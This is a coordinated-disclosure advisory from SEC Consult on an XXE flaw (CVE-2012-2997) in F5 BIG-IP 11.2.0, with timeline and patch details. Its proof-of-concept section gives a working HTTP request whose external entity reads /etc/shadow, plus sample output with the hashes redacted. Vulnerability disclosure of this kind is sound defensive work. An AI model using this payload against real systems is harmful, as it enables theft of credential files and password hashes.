F5 BIG-IP 11.2.0 XML External Entity Injection

`SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >  
=======================================================================  
title: XML External Entity Injection (XXE)  
product: F5 BIG-IP  
vulnerable version: <=11.2.0  
fixed version: 11.2.0 HF3  
11.2.1 HF3  
CVE number: CVE-2012-2997  
impact: Medium  
homepage: http://www.f5.com/  
found: 2012-09-03  
by: S. Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
"The BIG-IP product suite is a system of application delivery services that  
work together on the same best-in-class hardware platform or software virtual  
instance. From load balancing and service offloading to acceleration and  
security, the BIG-IP system delivers agility—and ensures your applications  
are fast, secure, and available."  
  
URL: http://www.f5.com/products/big-ip/  
  
  
Vulnerability overview/description:  
-----------------------------------  
An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP  
component. This enables an authenticated attacker to download arbitrary files  
from the file system with the rights of the "apache" OS user. The BIG-IP  
configuration even allows access to the critical /etc/shadow file which  
contains the password hashes of users.  
  
  
Proof of concept:  
-----------------  
The following exploit shows how files can be extracted from the file system:  
  
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1  
Host: bigip  
Cookie: BIGIPAuthCookie=*VALID_COOKIE*  
Content-Length: 143  
  
<?xml version="1.0" encoding='utf-8' ?>  
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>  
<message><dialogueType>&e;</dialogueType></message>  
  
  
The response includes the content of the file:  
  
<?xml version="1.0" encoding="utf-8"?>  
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client  
has sent unknown dialogueType '  
root:--hash--:15490::::::  
bin:*:15490::::::  
daemon:*:15490::::::  
adm:*:15490::::::  
lp:*:15490::::::  
mail:*:15490::::::  
uucp:*:15490::::::  
operator:*:15490::::::  
nobody:*:15490::::::  
tmshnobody:*:15490::::::  
admin:--hash--:15490:0:99999:7:::  
...  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.  
No modules have to be enabled for successful exploitation.  
  
  
Vendor contact timeline:  
------------------------  
2012-09-07: Contacting vendor - reqesting PGP/SMIME key.  
2012-09-07: Vendor provides case number and PGP key.  
2012-09-11: Sending advisory draft and proof of concept.  
2012-09-20: Vendor has a fix for the vulnerability - will be released "with  
different hot fixes for different releases".  
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and  
11.2.1 HF3.  
2013-01-22: SEC Consult releases coordinated security advisory.  
  
  
Solution:  
---------  
Update to 11.2.0 HF3 or 11.2.1 HF3.  
  
Patch information is also available at:  
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
  
EOF S. Viehböck / @2013  
`